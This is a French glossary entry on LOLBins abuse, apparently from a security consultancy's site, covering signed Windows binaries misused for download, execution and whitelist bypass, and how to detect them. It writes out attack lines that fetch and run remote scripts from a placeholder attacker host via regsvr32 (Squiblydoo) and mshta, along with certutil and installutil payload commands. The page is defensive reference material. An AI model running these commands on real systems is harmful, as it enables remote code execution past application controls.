Aller au contenu principal
Expert Cybersécurité & IAv9.0
Centres de ressources conformité
Besoin d'un accompagnement expert ?
Devis personnalisé sous 24h — audit, conformité, incident
Checklists Sécurité — Audit & Durcissement
Formats disponibles
📄 PDF 📊 Excel 🌐 Web

11 checklists professionnelles couvrant 2 200+ points de contrôle. Téléchargement gratuit, aucune inscription.

LOLBins Abuse

hacking

Définition

LOLBins Abuse (Living Off the Land Binaries Abuse) désigne l'utilisation détournée de binaires, scripts et bibliothèques légitimes fournis avec le système d'exploitation Windows (ou d'autres OS) pour effectuer des actions malveillantes sans avoir à introduire des outils externes. La technique tire son nom du concept de 'vivre aux dépens du pays' : l'attaquant utilise les ressources déjà présentes sur le terrain. Le projet LOLBAS (lolbas-project.github.io) documente plus de 150 binaires Windows légitimes avec leurs utilisations offensives : download de fichiers (certutil.exe, bitsadmin.exe, mshta.exe, powershell.exe, wget.exe natif), exécution de code arbitraire (regsvr32.exe, mshta.exe, wmic.exe, cmstp.exe, rundll32.exe), contournement de liste blanche d'applications (installutil.exe, regsvcs.exe, mavinject.exe, ieexec.exe), et encode/decode de données (certutil.exe -encode/-decode). Des exemples emblématiques : certutil.exe -decode payload.b64 payload.exe télécharge et décode un payload depuis une chaîne base64, regsvr32.exe /s /n /u /i:http://attaquant.com/file.sct scrobj.dll exécute un script COM depuis une URL distante (technique Squiblydoo), mshta.exe http://attaquant.com/file.hta exécute un HTA (HTML Application) arbitraire, et installutil.exe /logfile= /logtoconsole=false /u payload.exe exécute du code .NET arbitraire. Sur Linux, le projet GTFOBins documente des utilisations similaires pour des binaires Unix (find, awk, python, perl, ruby, bash, etc.) pour l'escalade de privilèges, la persistance, et l'exfiltration. Ces binaires sont souvent accessibles avec des permissions sudo ou SUID. L'efficacité des LOLBins réside dans leur légitimité : ils sont signés par Microsoft, présents dans C:\Windows\System32, et inclus dans les listes blanches d'applications (AppLocker, WDAC). Bloquer ou alerter sur leur utilisation nécessite une analyse du contexte (arguments, processus parent) plutôt que de leur simple présence.

Fonctionnement

Squiblydoo (regsvr32 bypass) : regsvr32 /s /n /u /i:http://attaquant.com/payload.sct scrobj.dll contourne AppLocker (regsvr32.exe est signé Microsoft, dans la liste blanche). Le SCT (scriptlet) est un fichier XML contenant du JScript/VBScript exécuté par scrobj.dll. Le script peut télécharger et exécuter un payload arbitraire. Détection : surveiller regsvr32.exe avec des arguments réseau (http://, //)

Exploitation offensive

Les LOLBins sont particulièrement utiles dans les environnements avec AppLocker ou Windows Defender Application Control (WDAC) qui bloquent les binaires non signés. En utilisant uniquement des binaires Microsoft signés, les attaquants contournent ces restrictions. Des chaînes complexes (certutil pour download → wmic pour exécution → mshta pour persistence) permettent des opérations complètes sans aucun binaire externe.

Détection et mitigation

La détection des LOLBins abuse nécessite une surveillance contextuelle des arguments et du processus parent : un regsvr32.exe avec des arguments URL, un certutil.exe exécuté depuis un script Office, ou un mshta.exe exécuté depuis PowerShell sont des indicateurs forts. Microsoft Defender for Endpoint et les SIEM avec des règles comportementales (Sigma rules sur LOLBAS) sont efficaces. WDAC en mode 'Allow Microsoft' bloque la plupart des LOLBins non dans la liste des allowed publishers.

Articles liés

Un projet cybersécurité ?

Expert dispo · Réponse 24h

Devis